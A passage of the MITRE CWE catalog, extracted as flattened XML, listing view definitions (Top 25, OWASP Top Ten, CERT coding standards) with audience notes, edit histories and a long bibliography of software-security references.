weakness. + + + + + + + CWE Content Team + MITRE + 2009-01-12 + 1.2 + 2009-01-12 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Description + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are listed in the 2010 CWE/SANS Top 25 Programming Errors. This view is considered obsolete as a newer version of the Top 25 is available. + + + Software Developers + By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software. + + + Product Customers + If a software developer claims to be following the Top 25, then customers can use the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25. + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Description + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE nodes in this view (graph) are associated with the OWASP Top Ten, as released in 2010. This view is considered obsolete as a newer version of the OWASP Top Ten is available. + + + Software Developers + This view outlines the most important issues as identified by the OWASP Top Ten (2010 version), providing a good starting point for web application developers who want to code more securely. + + + Product Customers + This view outlines the most important issues as identified by the OWASP Top Ten (2010 version), providing customers with a way of asking their software developers to follow minimum expectations for secure code. + + + Educators + Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view are a direct extraction of the CWE mappings that are in the 2010 OWASP document. CWE has changed since the release of that document. + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + MITRE + 2013-07-16 + Updated Reference URL + + + CWE Content Team + MITRE + 2013-07-17 + updated References + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Description + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the book "The CERT Oracle Secure Coding Standard for Java" published in 2011. This view is considered obsolete as a newer version of the coding standard is available. + + + Software Developers + By following The CERT Oracle Secure Coding Standard for Java, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. + + + Product Customers + If a software developer claims to be following The CERT Oracle Secure Coding Standard for Java, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References, View_Audience + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses Addressed by the CERT Java Secure Coding Standard + + + + CWE entries in this view (graph) are fully or partially eliminated by following the SEI CERT C++ Coding Standard, as published in 2016. This view is no longer being actively maintained, since it statically represents the coding rules as they were in 2016. + + + Software Developers + By following the CERT C++ Secure Coding Standard, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. + + + Product Customers + If a software developer claims to be following the CERT C++ Secure Coding Standard, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Maintenance_Notes, Name, References + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses Addressed by the CERT C++ Secure Coding Standard + + + + This view contains a selection of weaknesses that represent the variety of weaknesses that are captured in CWE, at a level of abstraction that is likely to be useful to most audiences. It can be used by researchers to determine how broad their theories, models, or tools are. It will also be used by the CWE content team in 2012 to focus quality improvement efforts for individual CWE entries. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2011-12-15 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE identifiers in this view are associated with clusters of Software Fault Patterns (SFPs). + + + Applied Researchers + + + Academic Researchers + + + Product Vendors + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2020-02-24 + updated References, View_Audience + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Djenana Campara + KDM Analytics + 2022-07-21 + reported gaps and inconsistencies in this view, leading to changes in taxonomy mappings and relationships in some entries + + + + + CWE entries in this view (graph) are listed in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors. + + + Software Developers + By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software. + + + Product Customers + If a software developer claims to be following the Top 25, then customers can use the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25. + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2011-06-25 + 2.0 + 2011-06-27 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (slice) are often seen in mobile applications. + /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Technology/@Class='Mobile'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2013-05-29 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Filter + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE nodes in this view (graph) are associated with the OWASP Top Ten, as released in 2013. This view is considered obsolete as a newer version of the OWASP Top Ten is available. + + + Software Developers + This view outlines the most important issues as identified by the OWASP Top Ten (2013 version), providing a good starting point for web application developers who want to code more securely. + + + Product Customers + This view outlines the most important issues as identified by the OWASP Top Ten (2013 version), providing customers with a way of asking their software developers to follow minimum expectations for secure code. + + + Educators + Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view have been pulled directly from the 2013 OWASP Top 10 document, either from the explicit mapping section, or from weakness types alluded to in the written sections. + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view has been deprecated. It was based on gaps in another view (CWE-888) related to research that is no longer updated, but was complete with respect to CWE at the time it was conducted. + /Weakness_Catalog[false()] + + Prohibited + This CWE has been deprecated. It is also a View. + N/A + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2019-01-03 + updated View_Filter + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2022-10-13 + updated Description, Name, Type, View_Audience, View_Filter + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Djenana Campara + KDM Analytics + 2022-07-21 + suggested that there were errors in this view (leading to changes in taxonomy mappings in some entries), and that this view was outdated, leading to the decision to deprecate + + Weaknesses without Software Fault Patterns + + + + + + NIST + CWE - Common Weakness Enumeration + http://nvd.nist.gov/cwe.cfm + + + OWASP + HttpOnly + https://owasp.org/www-community/HttpOnly + 2023-04-07 + + + Michael Howard + Some Bad News and Some Good News + 2002 + https://learn.microsoft.com/en-us/previous-versions/ms972826(v=msdn.10)?redirectedfrom=MSDN + 2023-04-07 + + + Troy Hunt + C is for cookie, H is for hacker - understanding HTTP only and Secure cookies + 2013 + --03 + ---26 + https://www.troyhunt.com/c-is-for-cookie-h-is-for-hacker/ + + + Microsoft + Mitigating Cross-site Scripting With HTTP-only Cookies + https://learn.microsoft.com/en-us/previous-versions//ms533046(v=vs.85)?redirectedfrom=MSDN + 2023-04-07 + + + Katrina Tsipenyuk + Brian Chess + Gary McGraw + Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors + NIST Workshop on Software Security Assurance Tools Techniques and Metrics + 2005 + --11 + ---07 + NIST + https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf + + + Michael Howard + David LeBlanc + Writing Secure Code + 2nd Edition + 2002 + --12 + ---04 + Microsoft Press + https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223 + + + Gregory Baatard + Peter Hannay + The 2011 IDN Homograph Attack Mitigation Survey + 2012 + ECU Publications + http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1174&context=ecuworks2012 + + + Santos, J. C. S. + Tarrit, K. + Mirakhorli, M. + A Catalog of Security Architecture Weaknesses. + 2017 IEEE International Conference on Software Architecture (ICSA) + 2017 + https://design.se.rit.edu/papers/cawe-paper.pdf + + + Santos, J. C. S. + Peruma, A. + Mirakhorli, M. + Galster, M. + Sejfia, A. + Understanding Software Vulnerabilities Related to Architectural Security Tactics: An Empirical Investigation of Chromium, PHP and Thunderbird. + 2017 IEEE International Conference on Software Architecture (ICSA) + 2017 + https://design.se.rit.edu/papers/TacticalVulnerabilities.pdf + + + Paul Kocher + Daniel Genkin + Daniel Gruss + Werner Haas + Mike Hamburg + Moritz Lipp + Stefan Mangard + Thomas Prescher + Michael Schwarz + Yuval Yarom + Spectre Attacks: Exploiting Speculative Execution + 2018 + --01 + ---03 + https://arxiv.org/abs/1801.01203 + + + Moritz Lipp + Michael Schwarz + Daniel Gruss + Thomas Prescher + Werner Haas + Stefan Mangard + Paul Kocher + Daniel Genkin + Yuval Yarom + Mike Hamburg + Meltdown + 2018 + --01 + ---03 + https://arxiv.org/abs/1801.01207 + + + Xuejing Yuan + Yuxuan Chen + Yue Zhao + Yunhui Long + Xiaokang Liu + Kai Chen + Shengzhi Zhang + Heqing Huang + Xiaofeng Wang + Carl A. Gunter + CommanderSong: A Systematic Approach for Practical Adversarial Voice Recognition + 2018 + --01 + ---24 + https://arxiv.org/pdf/1801.08535.pdf + + + Nicholas Carlini + David Wagner + Audio Adversarial Examples: Targeted Attacks on Speech-to-Text + 2018 + --01 + ---05 + https://arxiv.org/abs/1801.01944 + + + James Vincent + Magic AI: These are the Optical Illusions that Trick, Fool, and Flummox Computers + 2017 + --04 + ---12 + The Verge + https://www.theverge.com/2017/4/12/15271874/ai-adversarial-images-fooling-attacks-artificial-intelligence + + + Christian Szegedy + Wojciech Zaremba + Ilya Sutskever + Joan Bruna + Dumitru Erhan + Ian Goodfellow + Rob Fergus + Intriguing properties of neural networks + 2014 + --02 + ---19 + https://arxiv.org/abs/1312.6199 + + + OpenAI + Attacking Machine Learning with Adversarial Examples + 2017 + --02 + ---24 + https://openai.com/research/attacking-machine-learning-with-adversarial-examples + 2023-04-07 + + + Secure Software, Inc. + The CLASP Application Security Process + 2005 + https://cwe.mitre.org/documents/sources/TheCLASPApplicationSecurityProcess.pdf + + + Nikolai Mansourov + Djenana Campara + System Assurance + 2010 + --12 + ---06 + https://www.elsevier.com/books/system-assurance/mansourov/978-0-12-381414-2 + + + Ben Calloni + Nikolai Mansourov + Djenana Campara + Task Order 0006: Vulnerability Path Analysis and Demonstration (VPAD). Volume 2 - White Box Definitions of Software Fault Patterns + 2011 + --12 + https://apps.dtic.mil/docs/citations/ADB381215 + + + OWASP + CSV Injection + 2020 + --02 + ---02 + https://owasp.org/www-community/attacks/CSV_Injection + + + Jamie Rougvie + Data Extraction to Command Execution CSV Injection + 2019 + --09 + ---06 + https://www.veracode.com/blog/secure-development/data-extraction-command-execution-csv-injection + + + George Mauer + The Absurdly Underestimated Dangers of CSV Injection + 2017 + --10 + ---07 + http://georgemauer.net/2017/10/07/csv-injection.html + + + James Kettle + Comma Separated Vulnerabilities + 2014 + --08 + ---29 + https://rstforums.com/forum/topic/82690-comma-separated-vulnerabilities/ + 2023-04-07 + + + Andrew Horton + Clickjacking For Shells + https://www.exploit-db.com/docs/17881.pdf + + + OWASP + Clickjacking - OWASP + https://owasp.org/www-community/attacks/Clickjacking + 2023-04-07 + + + Internet Security + SecTheory + https://www.sectheory.com/clickjacking.htm + 2023-04-07 + + + W3C + Content Security Policy Level 3 + https://w3c.github.io/webappsec-csp/ + + + Alex Yumashev + Target="_blank" - the most underestimated vulnerability ever + 2016 + --05 + ---04 + https://medium.com/@jitbit/target-blank-the-most-underestimated-vulnerability-ever-96e328301f4c + + + Ben Halpern + The target="_blank" vulnerability by example + 2016 + --09 + ---11 + https://dev.to/ben/the-targetblank-vulnerability-by-example + + + Fortify Software + Fortify Descriptions + http://vulncat.fortifysoftware.com + + + Beth Stearns + The Java(TM) Tutorial: The Java Native Interface + 2005 + Sun Microsystems + http://www.eg.bucknell.edu/~mead/Java-tutorial/native1.1/index.html + + + OWASP + OWASP TOP 10 + 2007 + --05 + ---18 + https://github.com/owasp-top/owasp-top-2007 + + + Michael Howard + David LeBlanc + John Viega + 24 Deadly Sins of Software Security + McGraw-Hill + 2010 + + + OWASP + OWASP Enterprise Security API (ESAPI) Project + http://www.owasp.org/index.php/ESAPI + + + Joshbw + Output Sanitization + 2008 + --09 + ---18 + https://web.archive.org/web/20081208054333/http://analyticalengine.net/archives/58 + 2023-04-07 + + + Niyaz PK + Sanitizing user data: How and where to do it + 2008 + --09 + ---11 + https://web.archive.org/web/20090105222005/http://www.diovo.com/2008/09/sanitizing-user-data-how-and-where-to-do-it/ + 2023-04-07 + + + Jeremiah Grossman + Input validation or output filtering, which is better? + 2007 + --01 + ---30 + https://blog.jeremiahgrossman.com/2007/01/input-validation-or-output-filtering.html + 2023-04-07 + + + Jim Manico + Input Validation - Not That Important + 2008 + --08 + ---10 + https://manicode.blogspot.com/2008/08/input-validation-not-that-important.html + 2023-04-07 + + + Michael Eddington + Preventing XSS with Correct Output Encoding + http://phed.org/2008/05/19/preventing-xss-with-correct-output-encoding/ + + + Greg Hoglund + Gary McGraw + Exploiting Software: How to Break Code + 2004 + --02 + ---27 + Addison-Wesley + http://www.exploitingsoftware.com/ + + + Alec Muffet + The night the log was forged + http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm + + + Microsoft + Using the Strsafe.h Functions + https://learn.microsoft.com/en-us/windows/win32/menurc/strsafe-ovw?redirectedfrom=MSDN + 2023-04-07 + + + Matt Messier + John Viega + Safe C String Library v1.0.3 + http://www.gnu-darwin.org/www001/ports-1.5a-CURRENT/devel/safestr/work/safestr-1.0.3/doc/safestr.html + 2023-04-07 + + + Michael Howard + Address Space Layout Randomization in Windows Vista + https://learn.microsoft.com/en-us/archive/blogs/michael_howard/address-space-layout-randomization-in-windows-vista + 2023-04-07 + + + Arjan van de Ven + Limiting buffer overflows with ExecShield + https://archive.is/saAFo + 2023-04-07 + + + PaX + https://en.wikipedia.org/wiki/Executable_space_protection#PaX + 2023-04-07 + + + Microsoft + Understanding DEP as a mitigation technology part 1 + https://msrc.microsoft.com/blog/2009/06/understanding-dep-as-a-mitigation-technology-part-1/ + 2023-04-07 + + + Mark Dowd + John McDonald + Justin Schuh + The Art of Software Security Assessment + 1st Edition + 2006 + Addison Wesley + + + Grant Murphy + Position Independent Executables (PIE) + 2012 + --11 + ---28 + Red Hat + https://www.redhat.com/en/blog/position-independent-executables-pie + 2023-04-07 + + + M. Howard + D. LeBlanc + J. Viega + 19 Deadly Sins of Software Security + 2005 + --07 + ---26 + McGraw-Hill/Osborne + + + OWASP, Fortify Software + ASP.NET Misconfiguration: Missing Custom Error Handling + http://www.owasp.org/index.php/ASP.NET_Misconfiguration:_Missing_Custom_Error_Handling + + + Jason Lam + Top 25 Series - Rank 3 - Classic Buffer Overflow + 2010 + --03 + ---02 + SANS Software Security Institute + http://software-security.sans.org/blog/2010/03/02/top-25-series-rank-3-classic-buffer-overflow/ + + + Sean Barnum + Michael Gegick + Least Privilege + 2005 + --09 + ---14 + https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege + 2023-04-07 + + + Buffer UNDERFLOWS: What do you know about it? + Vuln-Dev Mailing List + 2004 + --01 + ---10 + https://seclists.org/vuln-dev/2004/Jan/22 + 2023-04-07 + + + Jason Lam + Top 25 Series - Rank 14 - Improper Validation of Array Index + 2010 + --03 + ---12 + SANS Software Security Institute + https://web.archive.org/web/20100316064026/http://blogs.sans.org/appsecstreetfighter/2010/03/12/top-25-series-rank-14-improper-validation-of-array-index/ + 2023-04-07 + + + Microsoft Corporation + How To: Encrypt Configuration Sections in ASP.NET 2.0 Using DPAPI + https://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff647398(v=pandp.10)?redirectedfrom=MSDN + 2023-04-07 + + + Microsoft Corporation + How To: Encrypt Configuration Sections in ASP.NET 2.0 Using RSA + https://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff650304(v=pandp.10)?redirectedfrom=MSDN + 2023-04-07 + + + Microsoft Corporation + .NET Framework Developer's Guide - Securing Connection Strings + http://msdn.microsoft.com/en-us/library/89211k9b(VS.80).aspx + + + David LeBlanc + Niels Dekker + SafeInt + http://safeint.codeplex.com/ + + + Jason Lam + Top 25 Series - Rank 18 - Incorrect Calculation of Buffer Size + 2010 + --03 + ---19 + SANS Software Security Institute + http://software-security.sans.org/blog/2010/03/19/top-25-series-rank-18-incorrect-calculation-of-buffer-size + + + Steve Christey + Format String Vulnerabilities in Perl Programs + https://seclists.org/fulldisclosure/2005/Dec/91 + 2023-04-07 + + + Hal Burch + Robert C. Seacord + Programming Language Format String Vulnerabilities + https://drdobbs.com/security/programming-language-format-string-vulne/197002914 + 2023-04-07 + + + Tim Newsham + Format String Attacks + 2000 + --09 + ---09 + Guardent + http://www.thenewsh.com/~newsham/format-string-attacks.pdf + + + Michael Howard + When scrubbing secrets in memory doesn't work + BugTraq + 2002 + --11 + ---05 + http://cert.uni-stuttgart.de/archive/bugtraq/2002/11/msg00046.html + + + Michael Howard + Some Bad News and Some Good News + 2002 + --10 + ---21 + Microsoft + https://learn.microsoft.com/en-us/previous-versions/ms972826(v=msdn.10) + 2023-04-07 + + + Joseph Wagner + GNU GCC: Optimizer Removes Code Necessary for Security + Bugtraq + 2002 + --11 + ---16 + https://seclists.org/bugtraq/2002/Nov/266 + 2023-04-07 + + + Greg Hoglund + Gary McGraw + Exploiting Software: How to Break Code + 2004 + --02 + ---27 + Addison-Wesley + https://www.amazon.com/Exploiting-Software-How-Break-Code/dp/0201786958 + 2023-04-07 + + + Steve Christey + Blacklist defenses as a breeding ground for vulnerability variants + 2006 + --02 + ---03 + https://seclists.org/fulldisclosure/2006/Feb/40 + 2023-04-07 + + + Yves Younan + An overview of common programming security vulnerabilities and possible solutions + Student thesis section 5.4.3 + 2003 + --08 + http://fort-knox.org/thesis.pdf + + + blexim + Basic Integer Overflows + Phrack - Issue 60, Chapter 10 + http://www.phrack.org/issues.html?issue=60&id=10#article + + + Johannes Ullrich + Top 25 Series - Rank 17 - Integer Overflow Or Wraparound + 2010 + --03 + ---18 + SANS Software Security Institute + http://software-security.sans.org/blog/2010/03/18/top-25-series-rank-17-integer-overflow-or-wraparound + + + Halvar Flake + Third Generation Exploits + presentation at Black Hat Europe 2001 + https://view.officeapps.live.com/op/view.aspx?src=https%3A%2F%2Fwww.blackhat.com%2Fpresentations%2Fbh-europe-01%2Fhalvar-flake%2Fbh-europe-01-halvarflake.ppt&wdOrigin=BROWSELINK + 2023-04-07 + + + Steve Christey + Off-by-one errors: a brief explanation + Secprog and SC-L mailing list posts + 2004 + --05 + ---05 + http://marc.info/?l=secprog&m=108379742110553&w=2 + + + klog + The Frame Pointer Overwrite + Phrack Issue 55, Chapter 8 + 1999 + --09 + ---09 + https://kaizo.org/mirrors/phrack/phrack55/P55-08 + 2023-04-07 + + + John McDonald + Mark Dowd + Justin Schuh + C Language Issues for Application Security + 2008 + --01 + ---25 + http://www.informit.com/articles/article.aspx?p=686170&seqNum=6 + + + Robert Seacord + Integral Security + 2006 + --11 + ---03 + https://drdobbs.com/cpp/integral-security/193501774 + 2023-04-07 + + + Jim Manico + Input Validation with ESAPI - Very Important + 2008 + --08 + ---15 + https://manicode.blogspot.com/2008/08/input-validation-with-esapi.html + 2023-04-07 + + + Joel Scambray + Mike Shema + Caleb Sima + Hacking Exposed Web Applications, Second Edition + 2006 + --06 + ---05 + McGraw-Hill + + + Kevin Beaver + The importance of input validation + 2006 + --09 + ---06 + http://searchsoftwarequality.techtarget.com/tip/0,289483,sid92_gci1214373,00.html + + + Chris Wysopal + Mobile App Top 10 List + 2010 + --12 + ---13 + https://www.veracode.com/blog/2010/12/mobile-app-top-10-list + 2023-04-07 + + + Web Application Security Consortium + Information Leakage + http://projects.webappsec.org/w/page/13246936/Information%20Leakage + 2023-04-07 + + + Brian Chess + Jacob West + Secure Programming with Static Analysis + 2007 + Addison-Wesley + + + Michael Howard + David LeBlanc + Writing Secure Code + 1st Edition + 2001 + --11 + ---13 + Microsoft Press + + + Johannes Ullrich + Top 25 Series - Rank 16 - Information Exposure Through an Error Message + 2010 + --03 + ---17 + SANS Software Security Institute + http://software-security.sans.org/blog/2010/03/17/top-25-series-rank-16-information-exposure-through-an-error-message + + + OWASP + Testing for Path Traversal (OWASP-AZ-001) + http://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001) + + + Johannes Ullrich + Top 25 Series - Rank 7 - Path Traversal + 2010 + --03 + ---09 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-7-path-traversal/ + 2023-04-07 + + + OWASP + OWASP Attack listing + http://www.owasp.org/index.php/Relative_Path_Traversal + + + Herbert Schildt + Herb Schildt's C++ Programming Cookbook + 2008 + --04 + ---28 + McGraw-Hill Osborne Media + + + Jerome H. Saltzer + Michael D. Schroeder + The Protection of Information in Computer Systems + Proceedings of the IEEE 63 + 1975 + --09 + http://web.mit.edu/Saltzer/www/publications/protection/ + + + NIST + United States Government Configuration Baseline (USGCB) + https://csrc.nist.gov/Projects/United-States-Government-Configuration-Baseline + 2023-03-28 + + + John Viega + Gary McGraw + Building Secure Software: How to Avoid Security Problems the Right Way + 1st Edition + 2002 + Addison-Wesley + + + NIST + Role Based Access Control and Role Based Security + https://csrc.nist.gov/projects/role-based-access-control + 2023-04-07 + + + Frank Kim + Top 25 Series - Rank 5 - Improper Access Control (Authorization) + 2010 + --03 + ---04 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-5-improper-access-control-authorization/ + 2023-04-07 + + + Rahul Bhattacharjee + Authentication using JAAS + https://javaranch.com/journal/2008/04/authentication-using-JAAS.html + 2023-04-07 + + + Kim Zetter + Weak Password Brings 'Happiness' to Twitter Hacker + 2009 + --01 + ---09 + https://www.wired.com/2009/01/professed-twitt/ + 2023-04-07 + + + OWASP + Top 10 2007-Broken Authentication and Session Management + 2007 + http://www.owasp.org/index.php/Top_10_2007-A7 + + + OWASP + Guide to Authentication + http://www.owasp.org/index.php/Guide_to_Authentication + + + Microsoft + Authentication + http://msdn.microsoft.com/en-us/library/aa374735(VS.85).aspx + + + Sascha Fahl, Marian Harbach, Thomas Muders, Matthew Smith + Lars Baumgärtner, Bernd Freisleben + Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security + 2012 + --10 + ---16 + http://www2.dcsec.uni-hannover.de/files/android/p50-fahl.pdf + + + M. Bishop + Computer Security: Art and Science + 2003 + Addison-Wesley + + + Martin Georgiev + Subodh Iyengar + Suman Jana + Rishita Anubhai + Dan Boneh + Vitaly Shmatikov + The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software + 2012 + --10 + ---25 + http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf + + + Kenneth Ballard + Secure programming with the OpenSSL API, Part 2: Secure handshake + 2005 + --05 + ---03 + https://developer.ibm.com/tutorials/l-openssl/?mhsrc=ibmsearch_a&mhq=secure%20programming%20with%20the%20openssl%20API + 2023-04-07 + + + Eric Rescorla + An Introduction to OpenSSL Programming (Part I) + 2001 + --10 + ---05 + https://www.linuxjournal.com/article/4822 + 2023-04-07 + + + Frank Kim + Top 25 Series - Rank 19 - Missing Authentication for Critical Function + 2010 + --02 + ---23 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-19-missing-authentication-for-critical-function/ + 2023-04-07 + + + Frank Kim + Top 25 Series - Rank 10 - Missing Encryption of Sensitive Data + 2010 + --02 + ---26 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-10-missing-encryption-of-sensitive-data/ + 2023-04-07 + + + Information Technology Laboratory, National Institute of Standards and Technology + SECURITY REQUIREMENTS FOR CRYPTOGRAPHIC MODULES + 2001 + --05 + ---25 + https://csrc.nist.gov/csrc/media/publications/fips/140/2/final/documents/fips1402.pdf + 2023-04-07 + + + OWASP + Top 10 2007-Insecure Communications + 2007 + http://www.owasp.org/index.php/Top_10_2007-A9 + + + Bruce Schneier + Applied Cryptography + 1996 + John Wiley & Sons + https://www.schneier.com/books/applied-cryptography + 2023-04-07 + + + Alfred J. Menezes + Paul C. van Oorschot + Scott A. Vanstone + Handbook of Applied Cryptography + 1996 + --10 + https://cacr.uwaterloo.ca/hac/ + 2023-04-07 + + + C Matthew Curtin + Avoiding bogus encryption products: Snake Oil FAQ + 1998 + --04 + ---10 + http://www.faqs.org/faqs/cryptography-faq/snake-oil/ + + + Paul F. Roberts + Microsoft Scraps Old Encryption in New Code + 2005 + --09 + ---15 + https://www.eweek.com/security/microsoft-scraps-old-encryption-in-new-code/ + 2023-04-07 + + + Johannes Ullrich + Top 25 Series - Rank 24 - Use of a Broken or Risky Cryptographic Algorithm + 2010 + --03 + ---25 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-use-of-a-broken-or-risky-cryptographic-algorithm/ + 2023-04-07 + + + Alexander Sotirov et al. + MD5 considered harmful today + http://www.phreedom.org/research/rogue-ca/ + 2023-04-07 + + + Johnny Shelley + bcrypt + http://bcrypt.sourceforge.net/ + + + Colin Percival + Tarsnap - The scrypt key derivation function and encryption utility + http://www.tarsnap.com/scrypt.html + + + B. Kaliski + RFC2898 - PKCS #5: Password-Based Cryptography Specification Version 2.0 + 2000 + https://www.rfc-editor.org/rfc/rfc2898 + 2023-04-07 + + + Coda Hale + How To Safely Store A Password + 2010 + --01 + ---31 + https://codahale.com/how-to-safely-store-a-password/ + 2023-04-07 + + + Brian Krebs + How Companies Can Beef Up Password Security (interview with Thomas H. Ptacek) + 